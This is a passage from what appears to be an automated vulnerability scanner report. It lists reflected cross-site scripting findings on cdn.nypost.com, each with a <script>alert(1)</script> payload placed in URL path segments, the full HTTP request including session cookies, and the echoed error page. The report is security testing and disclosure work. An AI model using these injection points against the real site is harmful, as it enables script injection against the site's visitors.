Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 731
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:56 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortalce2a6<script>alert(1)</script>786c1e2c906/nypost/blocks/most_popular/most_popular_functions.js</p>
...[SNIP]...

1.21. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a3375<script>alert(1)</script>0641c60ed8a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nyposta3375<script>alert(1)</script>0641c60ed8a/blocks/most_popular/most_popular_functions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 731
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:55:04 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nyposta3375<script>alert(1)</script>0641c60ed8a/blocks/most_popular/most_popular_functions.js</p>
...[SNIP]...

1.22. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 82dc5<script>alert(1)</script>4223b8bb7b2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks82dc5<script>alert(1)</script>4223b8bb7b2/most_popular/most_popular_functions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 731
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:55:13 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks82dc5<script>alert(1)</script>4223b8bb7b2/most_popular/most_popular_functions.js</p>
...[SNIP]...

1.23. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 52b24<script>alert(1)</script>f631577f766 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/most_popular52b24<script>alert(1)</script>f631577f766/most_popular_functions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 731
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:55:22 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/most_popular52b24<script>alert(1)</script>f631577f766/most_popular_functions.js</p>
...[SNIP]...

1.24. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 453a2<script>alert(1)</script>d24855ab4e6 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js453a2<script>alert(1)</script>d24855ab4e6 HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 731
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:55:30 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js453a2<script>alert(1)</script>d24855ab4e6</p>
...[SNIP]...

1.25. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/post_ten/post_ten_functions.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/post_ten/post_ten_functions.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 72157<script>alert(1)</script>b863d73c23e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig72157<script>alert(1)</script>b863d73c23e/WebPortal/nypost/blocks/post_ten/post_ten_functions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 723
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:48 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig72157<script>alert(1)</script>b863d73c23e/WebPortal/nypost/blocks/post_ten/post_ten_functions.js</p>
...[SNIP]...

1.26. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/post_ten/post_ten_functions.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/post_ten/post_ten_functions.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4b265<script>alert(1)</script>5c62dc37e5a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal4b265<script>alert(1)</script>5c62dc37e5a/nypost/blocks/post_ten/post_ten_functions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 723
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:56 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal4b265<script>alert(1)</script>5c62dc37e5a/nypost/blocks/post_ten/post_ten_functions.js</p>
...[SNIP]...

1.27. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/post_ten/post_ten_functions.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/post_ten/post_ten_functions.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e4785<script>alert(1)</script>52e9494240c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nyposte4785<script>alert(1)</script>52e9494240c/blocks/post_ten/post_ten_functions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 723
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:55:04 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nyposte4785<script>alert(1)</script>52e9494240c/blocks/post_ten/post_ten_functions.js</p>
...[SNIP]...

1.28. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/post_ten/post_ten_functions.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/post_ten/post_ten_functions.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 9421d<script>alert(1)</script>0bbcdc49ffc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks9421d<script>alert(1)</script>0bbcdc49ffc/post_ten/post_ten_functions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 723
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:55:13 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks9421d<script>alert(1)</script>0bbcdc49ffc/post_ten/post_ten_functions.js</p>
...[SNIP]...

1.29. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/post_ten/post_ten_functions.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/post_ten/post_ten_functions.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 64098<script>alert(1)</script>2da4cc43cc was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/post_ten64098<script>alert(1)</script>2da4cc43cc/post_ten_functions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 722
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:55:22 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/post_ten64098<script>alert(1)</script>2da4cc43cc/post_ten_functions.js</p>
...[SNIP]...

1.30. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/post_ten/post_ten_functions.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/post_ten/post_ten_functions.js

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload cc022<script>alert(1)</script>06cdb8d3e89 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/post_ten/post_ten_functions.jscc022<script>alert(1)</script>06cdb8d3e89 HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 723
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:55:30 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/post_ten/post_ten_functions.jscc022<script>alert(1)</script>06cdb8d3e89</p>
...[SNIP]...

1.31. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/search/search.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/search/search.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 848dc<script>alert(1)</script>b2588eeb12a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig848dc<script>alert(1)</script>b2588eeb12a/WebPortal/nypost/blocks/search/search.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 709
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:21 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig848dc<script>alert(1)</script>b2588eeb12a/WebPortal/nypost/blocks/search/search.js</p>
...[SNIP]...

1.32. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/search/search.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/search/search.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4546e<script>alert(1)</script>7ee4c74c348 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal4546e<script>alert(1)</script>7ee4c74c348/nypost/blocks/search/search.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 709
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:28 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal4546e<script>alert(1)</script>7ee4c74c348/nypost/blocks/search/search.js</p>
...[SNIP]...

1.33. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/search/search.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/search/search.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f42e3<script>alert(1)</script>e29f3d647b0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

